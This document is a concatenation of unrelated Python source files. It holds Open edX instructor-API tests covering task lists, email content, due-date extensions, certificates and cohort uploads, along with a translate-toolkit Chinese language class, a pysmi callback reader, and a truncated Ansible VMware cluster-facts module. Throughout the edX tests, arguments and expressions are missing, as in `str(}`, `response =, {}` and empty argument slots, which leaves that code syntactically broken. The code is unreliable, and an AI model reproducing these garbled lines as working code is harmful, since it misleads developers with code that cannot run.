sender=self.instructor, subject=self.full_test_message['subject'], html_message=self.full_test_message['message'], template_name=org_template, from_addr=org_email).count() class MockCompletionInfo: """Mock for get_task_completion_info""" times_called = 0 def mock_get_task_completion_info(self, *args): # pylint: disable=unused-argument """Mock for get_task_completion_info""" self.times_called += 1 if self.times_called % 2 == 0: return True, 'Task Completed' return False, 'Task Errored In Some Way' class TestInstructorAPITaskLists(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Test instructor task list endpoint. """ class FakeTask: """ Fake task object """ FEATURES = [ 'task_type', 'task_input', 'task_id', 'requester', 'task_state', 'created', 'status', 'task_message', 'duration_sec' ] def __init__(self, completion): for feature in self.FEATURES: setattr(self, feature, 'expected') # created needs to be a datetime self.created = datetime.datetime(2013, 10, 25, 11, 42, 35) # set 'status' and 'task_message' attrs success, task_message = completion() if success: self.status = "Complete" else: self.status = "Incomplete" self.task_message = task_message # Set 'task_output' attr, which will be parsed to the 'duration_sec' attr. self.task_output = '{"duration_ms": 1035000}' self.duration_sec = 1035000 / 1000.0 def make_invalid_output(self): """Munge task_output to be invalid json""" self.task_output = 'HI MY NAME IS INVALID JSON' # This should be given the value of 'unknown' if the task output # can't be properly parsed self.duration_sec = 'unknown' def to_dict(self): """ Convert fake task to dictionary representation. """ attr_dict = {key: getattr(self, key) for key in self.FEATURES} attr_dict['created'] = attr_dict['created'].isoformat() return attr_dict @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create( entrance_exam_id='i4x://{}/{}/chapter/Entrance_exam'.format('test_org', 'test_course') ) cls.problem_location = msk_from_problem_urlname(, 'robot-some-problem-urlname' ) cls.problem_urlname = str(cls.problem_location) def setUp(self): super().setUp() self.instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') self.student = UserFactory() CourseEnrollment.enroll(self.student, self.module = StudentModule.objects.create( student=self.student,, module_state_key=self.problem_location, state=json.dumps({'attempts': 10}), ) mock_factory = MockCompletionInfo() self.tasks = [self.FakeTask(mock_factory.mock_get_task_completion_info) for _ in range(7)] self.tasks[-1].make_invalid_output() @patch('lms.djangoapps.instructor_task.api.get_running_instructor_tasks') def test_list_instructor_tasks_running(self, act): """ Test list of all running tasks. """ act.return_value = self.tasks url = reverse('list_instructor_tasks', kwargs={'course_id': str(}) mock_factory = MockCompletionInfo() with patch( 'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info' ) as mock_completion_info: mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info response =, {}) assert response.status_code == 200 # check response assert act.called expected_tasks = [ftask.to_dict() for ftask in self.tasks] actual_tasks = json.loads(response.content.decode('utf-8'))['tasks'] for exp_task, act_task in zip(expected_tasks, actual_tasks): self.assertDictEqual(exp_task, act_task) assert actual_tasks == expected_tasks @patch('lms.djangoapps.instructor_task.api.get_instructor_task_history') def test_list_background_email_tasks(self, act): """Test list of background email tasks.""" act.return_value = self.tasks url = reverse('list_background_email_tasks', kwargs={'course_id': str(}) mock_factory = MockCompletionInfo() with patch( 'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info' ) as mock_completion_info: mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info response =, {}) assert response.status_code == 200 # check response assert act.called expected_tasks = [ftask.to_dict() for ftask in self.tasks] actual_tasks = json.loads(response.content.decode('utf-8'))['tasks'] for exp_task, act_task in zip(expected_tasks, actual_tasks): self.assertDictEqual(exp_task, act_task) assert actual_tasks == expected_tasks @patch('lms.djangoapps.instructor_task.api.get_instructor_task_history') def test_list_instructor_tasks_problem(self, act): """ Test list task history for problem. """ act.return_value = self.tasks url = reverse('list_instructor_tasks', kwargs={'course_id': str(}) mock_factory = MockCompletionInfo() with patch( 'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info' ) as mock_completion_info: mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info response =, { 'problem_location_str': self.problem_urlname, }) assert response.status_code == 200 # check response assert act.called expected_tasks = [ftask.to_dict() for ftask in self.tasks] actual_tasks = json.loads(response.content.decode('utf-8'))['tasks'] for exp_task, act_task in zip(expected_tasks, actual_tasks): self.assertDictEqual(exp_task, act_task) assert actual_tasks == expected_tasks @patch('lms.djangoapps.instructor_task.api.get_instructor_task_history') def test_list_instructor_tasks_problem_student(self, act): """ Test list task history for problem AND student. """ act.return_value = self.tasks url = reverse('list_instructor_tasks', kwargs={'course_id': str(}) mock_factory = MockCompletionInfo() with patch( 'lms.djangoapps.instructor.views.instructor_task_helpers.get_task_completion_info' ) as mock_completion_info: mock_completion_info.side_effect = mock_factory.mock_get_task_completion_info response =, { 'problem_location_str': self.problem_urlname, 'unique_student_identifier':, }) assert response.status_code == 200 # check response assert act.called expected_tasks = [ftask.to_dict() for ftask in self.tasks] actual_tasks = json.loads(response.content.decode('utf-8'))['tasks'] for exp_task, act_task in zip(expected_tasks, actual_tasks): self.assertDictEqual(exp_task, act_task) assert actual_tasks == expected_tasks @patch('lms.djangoapps.instructor_task.api.get_instructor_task_history', autospec=True) class TestInstructorEmailContentList(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Test the instructor email content history endpoint. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() def setUp(self): super().setUp() self.instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') self.tasks = {} self.emails = {} self.emails_info = {} def setup_fake_email_info(self, num_emails, with_failures=False): """ Initialize the specified number of fake emails """ for email_id in range(num_emails): num_sent = random.randint(1, 15401) if with_failures: failed = random.randint(1, 15401) else: failed = 0 self.tasks[email_id] = FakeContentTask(email_id, num_sent, failed, 'expected') self.emails[email_id] = FakeEmail(email_id) self.emails_info[email_id] = FakeEmailInfo(self.emails[email_id], num_sent, failed) def get_matching_mock_email(self, **kwargs): """ Returns the matching mock emails for the given id """ email_id = kwargs.get('id', 0) return self.emails[email_id] def get_email_content_response(self, num_emails, task_history_request, with_failures=False): """ Calls the list_email_content endpoint and returns the repsonse """ self.setup_fake_email_info(num_emails, with_failures) task_history_request.return_value = list(self.tasks.values()) url = reverse('list_email_content', kwargs={'course_id': str(}) with patch('lms.djangoapps.instructor.views.api.CourseEmail.objects.get') as mock_email_info: mock_email_info.side_effect = self.get_matching_mock_email response =, {}) assert response.status_code == 200 return response def check_emails_sent(self, num_emails, task_history_request, with_failures=False): """ Tests sending emails with or without failures """ response = self.get_email_content_response(num_emails, task_history_request, with_failures) assert task_history_request.called expected_email_info = [email_info.to_dict() for email_info in self.emails_info.values()] actual_email_info = json.loads(response.content.decode('utf-8'))['emails'] assert len(actual_email_info) == num_emails for exp_email, act_email in zip(expected_email_info, actual_email_info): self.assertDictEqual(exp_email, act_email) assert expected_email_info == actual_email_info def test_content_list_one_email(self, task_history_request): """ Test listing of bulk emails when email list has one email """ response = self.get_email_content_response(1, task_history_request) assert task_history_request.called email_info = json.loads(response.content.decode('utf-8'))['emails'] # Emails list should have one email assert len(email_info) == 1 # Email content should be what's expected expected_message = self.emails[0].html_message returned_email_info = email_info[0] received_message = returned_email_info['email']['html_message'] assert expected_message == received_message def test_content_list_no_emails(self, task_history_request): """ Test listing of bulk emails when email list empty """ response = self.get_email_content_response(0, task_history_request) assert task_history_request.called email_info = json.loads(response.content.decode('utf-8'))['emails'] # Emails list should be empty assert len(email_info) == 0 def test_content_list_email_content_many(self, task_history_request): """ Test listing of bulk emails sent large amount of emails """ self.check_emails_sent(50, task_history_request) def test_list_email_content_error(self, task_history_request): """ Test handling of error retrieving email """ invalid_task = FakeContentTask(0, 0, 0, 'test') invalid_task.make_invalid_input() task_history_request.return_value = [invalid_task] url = reverse('list_email_content', kwargs={'course_id': str(}) response =, {}) assert response.status_code == 200 assert task_history_request.called returned_email_info = json.loads(response.content.decode('utf-8'))['emails'] assert len(returned_email_info) == 1 returned_info = returned_email_info[0] for info in ['created', 'sent_to', 'email', 'number_sent', 'requester']: assert returned_info[info] is None def test_list_email_with_failure(self, task_history_request): """ Test the handling of email task that had failures """ self.check_emails_sent(1, task_history_request, True) def test_list_many_emails_with_failures(self, task_history_request): """ Test the handling of many emails with failures """ self.check_emails_sent(50, task_history_request, True) def test_list_email_with_no_successes(self, task_history_request): task_info = FakeContentTask(0, 0, 10, 'expected') email = FakeEmail(0) email_info = FakeEmailInfo(email, 0, 10) task_history_request.return_value = [task_info] url = reverse('list_email_content', kwargs={'course_id': str(}) with patch('lms.djangoapps.instructor.views.api.CourseEmail.objects.get') as mock_email_info: mock_email_info.return_value = email response =, {}) assert response.status_code == 200 assert task_history_request.called returned_info_list = json.loads(response.content.decode('utf-8'))['emails'] assert len(returned_info_list) == 1 returned_info = returned_info_list[0] expected_info = email_info.to_dict() self.assertDictEqual(expected_info, returned_info) class TestInstructorAPIHelpers(TestCase): """ Test helpers for instructor.api """ def test_split_input_list(self): strings = [] lists = [] strings.append( "Lorem@ipsum.dolor, sit@amet.consectetur\nadipiscing@elit.Aenean\r convallis@at.lacus\r, ut@lacinia.Sed") lists.append(['Lorem@ipsum.dolor', 'sit@amet.consectetur', 'adipiscing@elit.Aenean', 'convallis@at.lacus', 'ut@lacinia.Sed']) for (stng, lst) in zip(strings, lists): assert _split_input_list(stng) == lst def test_split_input_list_unicode(self): assert _split_input_list(',') == ['', ''] assert _split_input_list(',') == ['', ''] assert _split_input_list(',') == ['', ''] scary_unistuff = chr(40960) + 'abcd' + chr(1972) assert _split_input_list(scary_unistuff) == [scary_unistuff] def test_msk_from_problem_urlname(self): course_id = CourseKey.from_string('MITx/6.002x/2013_Spring') name = 'L2Node1' output = 'i4x://MITx/6.002x/problem/L2Node1' assert str(msk_from_problem_urlname(course_id, name)) == output def test_msk_from_problem_urlname_error(self): args = ('notagoodcourse', 'L2Node1') with pytest.raises(ValueError): msk_from_problem_urlname(*args) def get_extended_due(course, unit, user): """ Gets the overridden due date for the given user on the given unit. Returns `None` if there is no override set. """ location = str(unit.location) dates = get_overrides_for_user(, user) for override in dates: if str(override['location']) == location: return override['actual_date'] return None def get_date_for_block(course, unit, user): """ Gets the due date for the given user on the given unit (overridden or original). Returns `None` if there is no date set. (Differs from edx-when's get_date_for_block only in that we skip the cache. """ return get_dates_for_course(, user=user, use_cached=False).get((unit.location, 'due'), None) class TestDueDateExtensions(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Test data dumps for reporting. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() cls.due = datetime.datetime(2010, 5, 12, 2, 42, tzinfo=UTC) with, emit_signals=False): cls.week1 = ItemFactory.create(due=cls.due) cls.week2 = ItemFactory.create(due=cls.due) cls.week3 = ItemFactory.create() # No due date cls.course.children = [ str(cls.week1.location), str(cls.week2.location), str(cls.week3.location) ] cls.homework = ItemFactory.create( parent_location=cls.week1.location, due=cls.due ) cls.week1.children = [str(cls.homework.location)] def setUp(self): """ Fixtures. """ super().setUp() user1 = UserFactory.create() StudentModule( state='{}',,, module_state_key=self.week1.location).save() StudentModule( state='{}',,, module_state_key=self.week2.location).save() StudentModule( state='{}',,, module_state_key=self.week3.location).save() StudentModule( state='{}',,, module_state_key=self.homework.location).save() user2 = UserFactory.create() StudentModule( state='{}',,, module_state_key=self.week1.location).save() StudentModule( state='{}',,, module_state_key=self.homework.location).save() user3 = UserFactory.create() StudentModule( state='{}',,, module_state_key=self.week1.location).save() StudentModule( state='{}',,, module_state_key=self.homework.location).save() self.user1 = user1 self.user2 = user2 CourseEnrollmentFactory.create(user=self.user1, CourseEnrollmentFactory.create(user=self.user2, self.instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') extract_dates(None, def test_change_due_date(self): url = reverse('change_due_date', kwargs={'course_id': str(}) response =, { 'student': self.user1.username, 'url': str(self.week1.location), 'due_datetime': '12/30/2013 00:00' }) assert response.status_code == 200, response.content assert datetime.datetime(2013, 12, 30, 0, 0, tzinfo=UTC) ==\ get_extended_due(self.course, self.week1, self.user1) def test_change_to_invalid_due_date(self): url = reverse('change_due_date', kwargs={'course_id': str(}) response =, { 'student': self.user1.username, 'url': str(self.week1.location), 'due_datetime': '01/01/2009 00:00' }) assert response.status_code == 400, response.content assert get_extended_due(self.course, self.week1, self.user1) is None def test_change_nonexistent_due_date(self): url = reverse('change_due_date', kwargs={'course_id': str(}) response =, { 'student': self.user1.username, 'url': str(self.week3.location), 'due_datetime': '12/30/2013 00:00' }) assert response.status_code == 400, response.content assert get_extended_due(self.course, self.week3, self.user1) is None @override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True) def test_reset_date(self): self.test_change_due_date() url = reverse('reset_due_date', kwargs={'course_id': str(}) response =, { 'student': self.user1.username, 'url': str(self.week1.location), }) assert response.status_code == 200, response.content assert self.due == get_extended_due(self.course, self.week1, self.user1) @override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True) def test_reset_date_only_in_edx_when(self): # Start with a unit that only has a date in edx-when assert get_date_for_block(self.course, self.week3, self.user1) is None original_due = datetime.datetime(2010, 4, 1, tzinfo=UTC) set_date_for_block(, self.week3.location, 'due', original_due) assert get_date_for_block(self.course, self.week3, self.user1) == original_due # set override, confirm it took override = datetime.datetime(2010, 7, 1, tzinfo=UTC) set_date_for_block(, self.week3.location, 'due', override, user=self.user1) assert get_date_for_block(self.course, self.week3, self.user1) == override # Now test that we noticed the edx-when date url = reverse('reset_due_date', kwargs={'course_id': str(}) response =, { 'student': self.user1.username, 'url': str(self.week3.location), }) self.assertContains(response, 'Successfully reset due date for student') assert get_date_for_block(self.course, self.week3, self.user1) == original_due def test_show_unit_extensions(self): self.test_change_due_date() url = reverse('show_unit_extensions', kwargs={'course_id': str(}) response =, {'url': str(self.week1.location)}) assert response.status_code == 200, response.content assert json.loads(response.content.decode('utf-8')) ==\ {u'data': [{'Extended Due Date': '2013-12-30 00:00', 'Full Name':, 'Username': self.user1.username}], u'header': ['Username', 'Full Name', 'Extended Due Date'], u'title': ('Users with due date extensions for %s' % self.week1.display_name)} def test_show_student_extensions(self): self.test_change_due_date() url = reverse('show_student_extensions', kwargs={'course_id': str(}) response =, {'student': self.user1.username}) assert response.status_code == 200, response.content assert json.loads(response.content.decode('utf-8')) ==\ {'data': [{'Extended Due Date': '2013-12-30 00:00', 'Unit': self.week1.display_name}], 'header': ['Unit', 'Extended Due Date'], 'title': ('Due date extensions for %s (%s)' % (, self.user1.username))} class TestDueDateExtensionsDeletedDate(ModuleStoreTestCase, LoginEnrollmentTestCase): """ Tests for deleting due date extensions """ def setUp(self): """ Fixtures. """ super().setUp() self.course = CourseFactory.create() self.due = datetime.datetime(2010, 5, 12, 2, 42, tzinfo=UTC) with, emit_signals=False): self.week1 = ItemFactory.create(due=self.due) self.week2 = ItemFactory.create(due=self.due) self.week3 = ItemFactory.create() # No due date self.course.children = [ str(self.week1.location), str(self.week2.location), str(self.week3.location) ] self.homework = ItemFactory.create( parent_location=self.week1.location, due=self.due ) self.week1.children = [str(self.homework.location)] user1 = UserFactory.create() StudentModule( state='{}',,, module_state_key=self.week1.location).save() StudentModule( state='{}',,, module_state_key=self.week2.location).save() StudentModule( state='{}',,, module_state_key=self.week3.location).save() StudentModule( state='{}',,, module_state_key=self.homework.location).save() user2 = UserFactory.create() StudentModule( state='{}',,, module_state_key=self.week1.location).save() StudentModule( state='{}',,, module_state_key=self.homework.location).save() user3 = UserFactory.create() StudentModule( state='{}',,, module_state_key=self.week1.location).save() StudentModule( state='{}',,, module_state_key=self.homework.location).save() self.user1 = user1 self.user2 = user2 CourseEnrollmentFactory.create(user=self.user1, CourseEnrollmentFactory.create(user=self.user2, self.instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') extract_dates(None, @override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True) def test_reset_extension_to_deleted_date(self): """ Test that we can delete a due date extension after deleting the normal due date, without causing an error. """ url = reverse('change_due_date', kwargs={'course_id': str(}) response =, { 'student': self.user1.username, 'url': str(self.week1.location), 'due_datetime': '12/30/2013 00:00' }) assert response.status_code == 200, response.content assert datetime.datetime(2013, 12, 30, 0, 0, tzinfo=UTC) ==\ get_extended_due(self.course, self.week1, self.user1) self.week1.due = None self.week1 =, extract_dates(None, # Now, week1's normal due date is deleted but the extension still exists. url = reverse('reset_due_date', kwargs={'course_id': str(}) response =, { 'student': self.user1.username, 'url': str(self.week1.location), }) assert response.status_code == 200, response.content assert self.due == get_extended_due(self.course, self.week1, self.user1) class TestCourseIssuedCertificatesData(SharedModuleStoreTestCase): """ Test data dumps for issued certificates. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() def setUp(self): super().setUp() self.instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') def generate_certificate(self, course_id, mode, status): """ Generate test certificate """ test_user = UserFactory() GeneratedCertificateFactory.create( user=test_user, course_id=course_id, mode=mode, status=status ) def test_certificates_features_against_status(self): """ Test certificates with status 'downloadable' should be in the response. """ url = reverse('get_issued_certificates', kwargs={'course_id': str(}) # firstly generating downloadable certificates with 'honor' mode certificate_count = 3 for __ in range(certificate_count): self.generate_certificate(, mode='honor', status=CertificateStatuses.generating) response = res_json = json.loads(response.content.decode('utf-8')) assert 'certificates' in res_json assert len(res_json['certificates']) == 0 # Certificates with status 'downloadable' should be in response. self.generate_certificate(, mode='honor', status=CertificateStatuses.downloadable) response = res_json = json.loads(response.content.decode('utf-8')) assert 'certificates' in res_json assert len(res_json['certificates']) == 1 def test_certificates_features_group_by_mode(self): """ Test for certificate csv features against mode. Certificates should be group by 'mode' in reponse. """ url = reverse('get_issued_certificates', kwargs={'course_id': str(}) # firstly generating downloadable certificates with 'honor' mode certificate_count = 3 for __ in range(certificate_count): self.generate_certificate(, mode='honor', status=CertificateStatuses.downloadable) response = res_json = json.loads(response.content.decode('utf-8')) assert 'certificates' in res_json assert len(res_json['certificates']) == 1 # retrieve the first certificate from the list, there should be 3 certificates for 'honor' mode. certificate = res_json['certificates'][0] assert certificate.get('total_issued_certificate') == 3 assert certificate.get('mode') == 'honor' assert certificate.get('course_id') == str( # Now generating downloadable certificates with 'verified' mode for __ in range(certificate_count): self.generate_certificate(, mode='verified', status=CertificateStatuses.downloadable ) response = res_json = json.loads(response.content.decode('utf-8')) assert 'certificates' in res_json # total certificate count should be 2 for 'verified' mode. assert len(res_json['certificates']) == 2 # retrieve the second certificate from the list certificate = res_json['certificates'][1] assert certificate.get('total_issued_certificate') == 3 assert certificate.get('mode') == 'verified' def test_certificates_features_csv(self): """ Test for certificate csv features. """ url = reverse('get_issued_certificates', kwargs={'course_id': str(}) # firstly generating downloadable certificates with 'honor' mode certificate_count = 3 for __ in range(certificate_count): self.generate_certificate(, mode='honor', status=CertificateStatuses.downloadable) current_date ="%B %d, %Y") response = self.client.get(url, {'csv': 'true'}) assert response['Content-Type'] == 'text/csv' assert response['Content-Disposition'] == u'attachment; filename={0}'.format('issued_certificates.csv') assert response.content.strip().decode('utf-8') == \ (((('"CourseID","Certificate Type","Total Certificates Issued","Date Report Run"\r\n"' + str( + '","honor","3","') + current_date) + '"') class TestBulkCohorting(SharedModuleStoreTestCase): """ Test adding users to cohorts in bulk via CSV upload. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() def setUp(self): super().setUp() self.staff_user = StaffFactory( self.non_staff_user = UserFactory.create() self.tempdir = tempfile.mkdtemp() self.addCleanup(shutil.rmtree, self.tempdir) def call_add_users_to_cohorts(self, csv_data, suffix='.csv'): """ Call `add_users_to_cohorts` with a file generated from `csv_data`. """ # this temporary file will be removed in `self.tearDown()` __, file_name = tempfile.mkstemp(suffix=suffix, dir=self.tempdir) with open(file_name, 'w') as file_pointer: file_pointer.write(csv_data) with open(file_name) as file_pointer: url = reverse('add_users_to_cohorts', kwargs={'course_id': str(}) return, {'uploaded-file': file_pointer}) def expect_error_on_file_content(self, file_content, error, file_suffix='.csv'): """ Verify that we get the error we expect for a given file input. """ self.client.login(username=self.staff_user.username, password='test') response = self.call_add_users_to_cohorts(file_content, suffix=file_suffix) assert response.status_code == 400 result = json.loads(response.content.decode('utf-8')) assert result['error'] == error def verify_success_on_file_content(self, file_content, mock_store_upload, mock_cohort_task): """ Verify that `addd_users_to_cohorts` successfully validates the file content, uploads the input file, and triggers the background task. """ mock_store_upload.return_value = (None, 'fake_file_name.csv') self.client.login(username=self.staff_user.username, password='test') response = self.call_add_users_to_cohorts(file_content) assert response.status_code == 204 assert mock_store_upload.called assert mock_cohort_task.called def test_no_cohort_field(self): """ Verify that we get a descriptive verification error when we haven't included a cohort field in the uploaded CSV. """ self.expect_error_on_file_content( 'username,email\n', "The file must contain a 'cohort' column containing cohort names." ) def test_no_username_or_email_field(self): """ Verify that we get a descriptive verification error when we haven't included a username or email field in the uploaded CSV. """ self.expect_error_on_file_content( 'cohort\n', "The file must contain a 'username' column, an 'email' column, or both." ) def test_empty_csv(self): """ Verify that we get a descriptive verification error when we haven't included any data in the uploaded CSV. """ self.expect_error_on_file_content( '', "The file must contain a 'cohort' column containing cohort names." ) def test_wrong_extension(self): """ Verify that we get a descriptive verification error when we haven't uploaded a file with a '.csv' extension. """ self.expect_error_on_file_content( '', "The file must end with the extension '.csv'.", file_suffix='.notcsv' ) def test_non_staff_no_access(self): """ Verify that we can't access the view when we aren't a staff user. """ self.client.login(username=self.non_staff_user.username, password='test') response = self.call_add_users_to_cohorts('') assert response.status_code == 403 @patch('lms.djangoapps.instructor_task.api.submit_cohort_students') @patch('lms.djangoapps.instructor.views.api.store_uploaded_file') def test_success_username(self, mock_store_upload, mock_cohort_task): """ Verify that we store the input CSV and call a background task when the CSV has username and cohort columns. """ self.verify_success_on_file_content( 'username,cohort\nfoo_username,bar_cohort', mock_store_upload, mock_cohort_task ) @patch('lms.djangoapps.instructor_task.api.submit_cohort_students') @patch('lms.djangoapps.instructor.views.api.store_uploaded_file') def test_success_email(self, mock_store_upload, mock_cohort_task): """ Verify that we store the input CSV and call the cohorting background task when the CSV has email and cohort columns. """ self.verify_success_on_file_content( 'email,cohort\nfoo_email,bar_cohort', mock_store_upload, mock_cohort_task ) @patch('lms.djangoapps.instructor_task.api.submit_cohort_students') @patch('lms.djangoapps.instructor.views.api.store_uploaded_file') def test_success_username_and_email(self, mock_store_upload, mock_cohort_task): """ Verify that we store the input CSV and call the cohorting background task when the CSV has username, email and cohort columns. """ self.verify_success_on_file_content( 'username,email,cohort\nfoo_username,bar_email,baz_cohort', mock_store_upload, mock_cohort_task ) @patch('lms.djangoapps.instructor_task.api.submit_cohort_students') @patch('lms.djangoapps.instructor.views.api.store_uploaded_file') def test_success_carriage_return(self, mock_store_upload, mock_cohort_task): """ Verify that we store the input CSV and call the cohorting background task when lines in the CSV are delimited by carriage returns. """ self.verify_success_on_file_content( 'username,email,cohort\rfoo_username,bar_email,baz_cohort', mock_store_upload, mock_cohort_task ) @patch('lms.djangoapps.instructor_task.api.submit_cohort_students') @patch('lms.djangoapps.instructor.views.api.store_uploaded_file') def test_success_carriage_return_line_feed(self, mock_store_upload, mock_cohort_task): """ Verify that we store the input CSV and call the cohorting background task when lines in the CSV are delimited by carriage returns and line feeds. """ self.verify_success_on_file_content( 'username,email,cohort\r\nfoo_username,bar_email,baz_cohort', mock_store_upload, mock_cohort_task ) class TestInstructorCertificateExceptions(SharedModuleStoreTestCase): """ Tests for utility functions utilized in the Instructor Dashboard Certificates app. """ def setUp(self): super().setUp() self.global_staff = GlobalStaffFactory() self.course = CourseFactory.create() self.user = UserFactory() CourseEnrollment.enroll(self.user, def test_get_student_from_request_data(self): """ Test ability to retrieve a learner record using their username and course id """ student = _get_student_from_request_data({"user": self.user.username}) assert student.username == self.user.username def test_get_student_from_request_data_empty_username(self): """ Test that we receive an expected error when no learner's username or email is entered """ with pytest.raises(ValueError) as error: _get_student_from_request_data({"user": ""}) assert str(error.value) == ( 'Student username/email field is required and can not be empty. Kindly fill in username/email and then ' 'press "Invalidate Certificate" button.' ) def test_get_student_from_request_data_user_dne(self): """ Test to verify an expected error message is returned when attempting to retrieve a learner that does not exist in the LMS. """ with pytest.raises(ValueError) as error: _get_student_from_request_data({"user": "Neo"}) assert str(error.value) == "Neo does not exist in the LMS. Please check your spelling and retry." def test_get_certificate_for_user(self): """ Test that attempts to retrieve a Certificate for a learner in a course-run. """ generated_certificate = GeneratedCertificateFactory.create( user=self.user,, mode='verified', status=CertificateStatuses.downloadable, ) retrieved_certificate = _get_certificate_for_user(, self.user) assert == def test_get_certificate_for_user_no_certificate(self): """ Test to verify an expected error message is returned when attempting to retrieve a certificate for a learner that does not exist yet. """ with pytest.raises(ValueError) as error: _get_certificate_for_user(, self.user) assert str(error.value) == ( f"The student {self.user} does not have certificate for the course {}. Kindly " "verify student username/email and the selected course are correct and try again." )
# -*- coding: utf-8 -*- # # Copyright 2007 Zuza Software Foundation # # This file is part of translate. # # translate is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # translate is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, see <>. """This module represents the Chinese language (Both tradisional and simplified). .. seealso:: """ from __future__ import unicode_literals import re from translate.lang import common class zh(common.Common): """This class represents Chinese.""" listseperator = "、" sentenceend = "。!?!?…" # Compared to, we make the space after the sentence ending # optional and don't demand an uppercase letter to follow. sentencere = re.compile(r"""(?s) # make . also match newlines .*? # any text, but match non-greedy [%s] # the puntuation for sentence ending \s* # the optional space after the puntuation """ % sentenceend, re.VERBOSE) # The following transformation rules should be mostly useful for all types # of Chinese. The comma (,) is not handled here, since it maps to two # different characters, depending on context. # If comma is used as seperation of sentence, it should be converted to a # fullwidth comma (","). If comma is used as seperation of list items # like "apple, orange, grape, .....", "、" is used. puncdict = { ". ": "。", "; ": ";", ": ": ":", "! ": "!", "? ": "?", ".\n": "。\n", ";\n": ";\n", ":\n": ":\n", "!\n": "!\n", "?\n": "?", "% ": "%", } @classmethod def length_difference(cls, length): return 10 - length / 2 ignoretests = { 'all': ["simplecaps", "startcaps"], }
# # This file is part of pysmi software. # # Copyright (c) 2015-2020, Ilya Etingof <> # License: # import time from pysmi.reader.base import AbstractReader from pysmi.mibinfo import MibInfo from pysmi import error from pysmi import debug class CallbackReader(AbstractReader): """Fetch ASN.1 MIB text by name by calling user-defined callable. *CallbackReader* class instance tries to retrieve ASN.1 MIB files by name and return their contents to caller. """ def __init__(self, cbFun, cbCtx=None): """Create an instance of *CallbackReader* bound to specific URL. Args: cbFun (callable): user callable accepting *MIB name* and *cbCtx* objects Keyword Args: cbCtx (object): user object that can be used to communicate state information between user-scope code and the *cbFun* callable scope """ self._cbFun = cbFun self._cbCtx = cbCtx def __str__(self): return '%s{"%s"}' % (self.__class__.__name__, self._cbFun) def getData(self, mibname, **options): debug.logger & debug.flagReader and debug.logger('calling user callback %s for MIB %s' % (self._cbFun, mibname)) res = self._cbFun(mibname, self._cbCtx) if res: return MibInfo(path='file:///dev/stdin', file='', name=mibname, mtime=time.time()), res raise error.PySmiReaderFileNotFoundError(mibname=mibname, reader=self)
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2018, Ansible Project # Copyright: (c) 2018, Abhijeet Kasurde <> # GNU General Public License v3.0+ (see COPYING or from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { 'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community' } DOCUMENTATION = ''' --- module: vmware_cluster_facts short_description: Gather facts about clusters available in given vCenter description: - This module can be used to gather facts about clusters in VMWare infrastructure. - All values and VMware object names are case sensitive. version_added: '2.6' author: - Abhijeet Kasurde (@akasurde) notes: - Tested on vSphere 6.5 requirements: - "python >= 2.6" - PyVmomi options: datacenter: description: - Datacenter to search for cluster/s. - This parameter is required, if C(cluster_name) is not supplied. required: False cluster_name: description: - Name of the cluster. - If set, facts of this cluster will be returned. - This parameter is required, if C(datacenter) is not supplied. required: False extends_documentation_fragment: vmware.documentation ''' EXAMPLES = ''' - name: Gather cluster facts from given datacenter vmware_cluster_facts: hostname: username: administrator@vsphere.local password: vmware datacenter: ha-datacenter validate_certs: False delegate_to: localhost register: cluster_facts - name: Gather facts from datacenter about specific cluster vmware_cluster_facts: hostname: username: administrator@vsphere.local password: vmware cluster_name: DC0_C0 validate_certs: False delegate_to: localhost register: cluster_facts ''' RETURN = """ clusters: description: metadata about the available clusters returned: always type: dict sample: { "DC0_C0": { "drs_default_vm_behavior": null, "drs_enable_vm_behavior_overrides": null, "drs_vmotion_rate": null, "enable_ha": null, "enabled_drs": true, "enabled_vsan": false, "ha_admission_control_enabled": null, "ha_failover_level": null, "ha_host_monitoring": null, "ha_restart_priority": null, "ha_vm_failure_interval": null, "ha_vm_max_failure_window": null, "ha_vm_max_failures": null, "ha_vm_min_up_time": null, "ha_vm_monitoring": null, "ha_vm_tools_monitoring": null, "vsan_auto_claim_storage": false }, } """ try: from pyVmomi import vim except ImportError: pass from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.vmware import PyVmomi, vmware_argument_spec, find_datacenter_by_name, find_cluster_by_name class VmwreClusterFactsManager(PyVmomi): def __init__(self, module): super(VmwreClusterFactsManager, self).__init__(module) datacenter = self.params.get('datacenter') cluster_name = self.params.get('cluster_name') self.cluster_objs = [] if datacenter: datacenter_obj = find_datacenter_by_name(self.content, datacenter_name=datacenter) if datacenter_obj is None: self.module.fail_json(msg="Failed to find datacenter '%s'" % datacenter) self.cluster_objs = self.get_all_cluster_objs(parent=datacenter_obj) elif cluster_name: cluster_obj = find_cluster_by_name(self.content, cluster_name=cluster_name) if cluster_obj is None: self.module.fail_json(msg="Failed 